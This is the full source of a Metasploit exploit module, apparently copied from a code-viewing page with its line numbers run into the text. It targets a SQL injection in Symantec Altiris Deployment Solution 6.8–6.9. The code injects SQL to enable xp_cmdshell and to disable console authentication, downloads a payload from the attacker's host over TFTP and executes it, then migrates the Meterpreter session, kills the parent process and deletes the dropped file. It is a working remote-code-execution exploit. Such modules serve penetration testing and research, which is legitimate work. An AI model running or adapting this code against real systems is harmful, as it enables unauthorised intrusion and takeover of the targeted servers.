Path: blob/master/modules/exploits/windows/misc/altiris_ds_sqli.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::CmdStager9include Msf::Exploit::Remote::Tcp1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Symantec Altiris DS SQL Injection',16'Description' => %q{17This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.818to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize19numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,20several SQL injections are required in close succession, first to enable xp_cmdshell, then21retrieve the payload via TFTP and finally execute it. The module also has the capability22to disable or enable local application authentication. In order to work the target system23must have a tftp client available.24},25'Author' => [26'Brett Moore', # Vulnerability discovery27'3v0lver' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31[ 'CVE', '2008-2286' ],32[ 'OSVDB', '45313' ],33[ 'BID', '29198'],34[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]35],36'DefaultOptions' => {37'EXITFUNC' => 'process',38},39'Targets' => [40[41'Windows 2003 (with tftp client available)',42{43'Arch' => ARCH_X86,44'Platform' => 'win'45}46]47],48'Privileged' => true,49'Platform' => 'win',50'DisclosureDate' => '2008-05-15',51'DefaultTarget' => 0,52'Compat' => {53'Meterpreter' => {54'Commands' => %w[55stdapi_fs_delete_file56stdapi_sys_config_getenv57stdapi_sys_process_attach58stdapi_sys_process_get_processes59stdapi_sys_process_kill60]61}62},63'Notes' => {64'Reliability' => UNKNOWN_RELIABILITY,65'Stability' => UNKNOWN_STABILITY,66'SideEffects' => UNKNOWN_SIDE_EFFECTS67}68)69)7071register_options(72[73Opt::RPORT(402),74OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),75OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),76OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])77]78)79deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')8081self.needs_cleanup = true82end8384def execute_command(cmd, opts = {})85inject = []8687if @xp_shell_enable88inject += [89"#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",90"#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",91]92@xp_shell_enable = false93end9495if @wc_disable_security96inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]97@wc_disable_security = false98end99100if @wc_enable_security101inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]102@wc_enable_security = false103end104105inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil106107inject.each do |sqli|108send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")109end110end111112def send_update_computer(processor_speed)113notification = %Q|Request=UpdateComputer114OS-Bit=32115CPU-Arch=x86116IP-Address=192.168.20.107117MAC-Address=005056C000AB118Name=Remove_test119OS=Windows XP120Version=2.6-38 (32-Bit)121LoggedIn=Yes122Boot-Env=Automation123Platform=Linux124Agent-Settings=Same125Sys-Info-TimeZoneBias=0126Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz127Processor-Speed=#{processor_speed}128\x00129|130131connect132sock.put(notification)133response = sock.get_once()134disconnect135136return response137end138139def check140res = send_update_computer("2659")141142unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/143return Exploit::CheckCode::Unknown144end145146version = $1147148unless version =~ /^6\.(\d+)\.(\d+)$/149return Exploit::CheckCode::Safe150end151152vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"153154minor = $1.to_i155build = $2.to_i156157if minor == 8158if build == 206 || build == 282 || build == 378159return Exploit::CheckCode::Appears160elsif build < 390161return Exploit::CheckCode::Appears162end163elsif minor == 9 and build < 176164# The existence of versions matching this profile is a possibility... none were observed in the wild though165# as such, we're basing confidence off of Symantec's vulnerability bulletin.166return Exploit::CheckCode::Appears167end168169return Exploit::CheckCode::Safe170end171172def exploit173@wc_disable_security = datastore['DISABLE_SECURITY']174@wc_enable_security = datastore['ENABLE_SECURITY']175@xp_shell_enable = datastore['XP_CMDSHELL']176177# CmdStagerVBS was tested here as well, however delivery took roughly178# 30 minutes and required sending almost 350 notification messages.179# size constraint requirement for SQLi is: linemax => 393180tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']181execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })182end183184def on_new_session(client)185return if not stager_instance.payload_exe186187# can't scrub dropped payload while the process is still active so...188# iterate through process list, find our process and the associated189# parent process ID, Kill the parent.190# This module doesn't use FileDropper because of timing issues when191# using migrate -f and FileDropper. On the other hand PrependMigrate192# has been avoided because of older issues with reverse_https payload193194unless client.type == "meterpreter"195print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")196return197end198199client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")200# migrate201print_status("Migrating ...")202client.console.run_single("run migrate -f")203# kill the parent process so the payload can hopefully be dropped204print_status("Kill parent process ...")205client.sys.process.get_processes().each do |proc|206if proc['pid'] == client.sys.process.open.pid207client.sys.process.kill(proc['ppid'])208end209end210211win_temp = client.sys.config.getenv('TEMP')212win_file = "#{win_temp}\\#{stager_instance.payload_exe}"213print_status("Attempting to delete #{win_file} ...")214client.shell_command_token(%Q|attrib.exe -r #{win_file}|)215client.fs.file.rm(win_file)216print_good("Deleted #{win_file}")217end218end219220221